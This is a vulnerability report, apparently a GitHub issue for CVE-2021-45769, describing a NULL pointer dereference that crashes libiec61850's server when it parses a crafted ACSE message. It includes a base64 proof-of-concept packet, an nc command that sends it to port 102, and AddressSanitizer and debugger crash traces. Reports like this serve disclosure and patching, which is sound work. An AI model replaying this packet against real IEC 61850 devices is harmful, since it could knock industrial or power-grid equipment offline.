Headline
CVE-2021-45769: NULL Pointer Dereference in AcseConnection_parseMessage · Issue #368 · mz-automation/libiec61850
A NULL pointer dereference in AcseConnection_parseMessage at src/mms/iso_acse/acse.c of libiec61850 v1.5.0 can lead to a segmentation fault or application crash.
NULL Pointer Dereference in AcseConnection_parseMessage****Description
A NULL Pointer Dereference was discovered in AcseConnection_parseMessage at src/mms/iso_acse/acse.c:429. The vulnerability causes a segmentation fault and application crash.
version
8eeb6f0
System information
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz
Proof of Concept
poc
base64 poc
AwAAFgLwgA0NAQDBATGBAgABogIAAA==
command:
./server_example_basic_io
nc 0.0.0.0 102 < poc
Result
./server_example_basic_io
Using libIEC61850 version 1.5.0
Connection opened
AddressSanitizer:DEADLYSIGNAL
=================================================================
==4028537==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55de6e46db68 bp 0x7fac36efcaa0 sp 0x7fac36efc9f0 T3)
==4028537==The signal is caused by a READ memory access.
==4028537==Hint: address points to the zero page.
#0 0x55de6e46db67 in AcseConnection_parseMessage src/mms/iso_acse/acse.c:429
#1 0x55de6e41960b in IsoConnection_handleTcpConnection src/mms/iso_server/iso_connection.c:233
#2 0x55de6e41ac5d in handleTcpConnection src/mms/iso_server/iso_connection.c:472
#3 0x7fac3b7e3608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477
#4 0x7fac3b5bb292 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x122292)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mms/iso_acse/acse.c:429 in AcseConnection_parseMessage
Thread T3 created by T1 here:
#0 0x7fac3b837805 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x3a805)
#1 0x55de6e3b19dc in Thread_start hal/thread/linux/thread_linux.c:89
#2 0x55de6e41b4f7 in IsoConnection_start src/mms/iso_server/iso_connection.c:581
#3 0x55de6e417bf1 in handleIsoConnections src/mms/iso_server/iso_server.c:520
#4 0x55de6e417c99 in isoServerThread src/mms/iso_server/iso_server.c:554
#5 0x7fac3b7e3608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477
Thread T1 created by T0 here:
#0 0x7fac3b837805 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x3a805)
#1 0x55de6e3b19dc in Thread_start hal/thread/linux/thread_linux.c:89
#2 0x55de6e4182d2 in IsoServer_startListening src/mms/iso_server/iso_server.c:682
#3 0x55de6e3b9b50 in MmsServer_startListening src/mms/iso_mms/server/mms_server.c:606
#4 0x55de6e3adae9 in IedServer_start src/iec61850/server/impl/ied_server.c:692
#5 0x55de6e39537e in main /root/disk2/fuzzing/libiec61850/test/libiec61850/examples/server_example_basic_io/server_example_basic_io.c:146
#6 0x7fac3b4c00b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
==4028537==ABORTING
gdb
Using libIEC61850 version 1.5.0
[New Thread 0x7ffff3bff700 (LWP 4048010)]
[New Thread 0x7ffff33fe700 (LWP 4048011)]
Connection opened
[New Thread 0x7ffff2bfd700 (LWP 4048307)]
Thread 4 "server_example_" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff2bfd700 (LWP 4048307)]
0x0000555555661b68 in AcseConnection_parseMessage (self=0x608000004020, message=0x6060000030a8) at src/mms/iso_acse/acse.c:429
429 uint8_t messageType = buffer[bufPos++];
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
RAX 0x0
RBX 0x7ffff2bfca20 ◂— 0x41b58ab3
RCX 0x0
RDX 0x0
RDI 0x7ffff2bfca80 —▸ 0x7ffff2bfce60 ◂— 0x0
RSI 0x0
R8 0x0
R9 0x32
R10 0x40
R11 0x0
R12 0xffffe57f944 ◂— 0x0
R13 0x7ffff2bfca20 ◂— 0x41b58ab3
R14 0x7ffff2bfcb40 ◂— 0x41b58ab3
R15 0x7ffff2bfcf80 ◂— 0x0
RBP 0x7ffff2bfcaa0 —▸ 0x7ffff2bfce80 —▸ 0x7ffff2bfceb0 ◂— 0x0
RSP 0x7ffff2bfc9f0 —▸ 0x6060000030a8 ◂— 0x0
RIP 0x555555661b68 (AcseConnection_parseMessage+383) ◂— movzx eax, byte ptr [rcx]
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
► 0x555555661b68 <AcseConnection_parseMessage+383> movzx eax, byte ptr [rcx]
0x555555661b6b <AcseConnection_parseMessage+386> mov byte ptr [rbp - 0x95], al
0x555555661b71 <AcseConnection_parseMessage+392> mov ecx, dword ptr [rbp - 0x90]
0x555555661b77 <AcseConnection_parseMessage+398> mov edx, dword ptr [rbp - 0x8c]
0x555555661b7d <AcseConnection_parseMessage+404> lea rsi, [rdi - 0x40]
0x555555661b81 <AcseConnection_parseMessage+408> mov rax, qword ptr [rbp - 0x88]
0x555555661b88 <AcseConnection_parseMessage+415> mov rdi, rax
0x555555661b8b <AcseConnection_parseMessage+418> call BerDecoder_decodeLength <BerDecoder_decodeLength>
0x555555661b90 <AcseConnection_parseMessage+423> mov dword ptr [rbp - 0x8c], eax
0x555555661b96 <AcseConnection_parseMessage+429> cmp dword ptr [rbp - 0x8c], 0
0x555555661b9d <AcseConnection_parseMessage+436> jns AcseConnection_parseMessage+448
<AcseConnection_parseMessage+448>
──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
In file: /root/disk2/fuzzing/libiec61850/test/libiec61850/src/mms/iso_acse/acse.c
424
425 int messageSize = message->size;
426
427 int bufPos = 0;
428
► 429 uint8_t messageType = buffer[bufPos++];
430
431 int len;
432
433 bufPos = BerDecoder_decodeLength(buffer, &len, bufPos, messageSize);
434
──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
00:0000│ rsp 0x7ffff2bfc9f0 —▸ 0x6060000030a8 ◂— 0x0
01:0008│ 0x7ffff2bfc9f8 —▸ 0x608000004020 ◂— 0x0
02:0010│ 0x7ffff2bfca00 —▸ 0x7ffff2bfcb40 ◂— 0x41b58ab3
03:0018│ 0x7ffff2bfca08 —▸ 0xa2310146 ◂— 0x0
04:0020│ 0x7ffff2bfca10 —▸ 0x100000000 ◂— 0x0
05:0028│ 0x7ffff2bfca18 ◂— 0x0
06:0030│ rbx r13 0x7ffff2bfca20 ◂— 0x41b58ab3
07:0038│ 0x7ffff2bfca28 —▸ 0x5555556d71d8 ◂— '1 32 4 7 len:431'
────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
► f 0 0x555555661b68 AcseConnection_parseMessage+383
f 1 0x55555560d60c IsoConnection_handleTcpConnection+1422
f 2 0x55555560ec5e handleTcpConnection+43
f 3 0x7ffff7564609 start_thread+217
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0 0x0000555555661b68 in AcseConnection_parseMessage (self=0x608000004020, message=0x6060000030a8) at
src/mms/iso_acse/acse.c:429
#1 0x000055555560d60c in IsoConnection_handleTcpConnection (self=0x61100000ff40, isSingleThread=false) at src/mms/iso_server/iso_connection.c:233
#2 0x000055555560ec5e in handleTcpConnection (parameter=0x61100000ff40) at src/mms/iso_server/iso_connection.c:472
#3 0x00007ffff7564609 in start_thread (arg=<optimized out>) at pthread_create.c:477
#4 0x00007ffff733c293 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95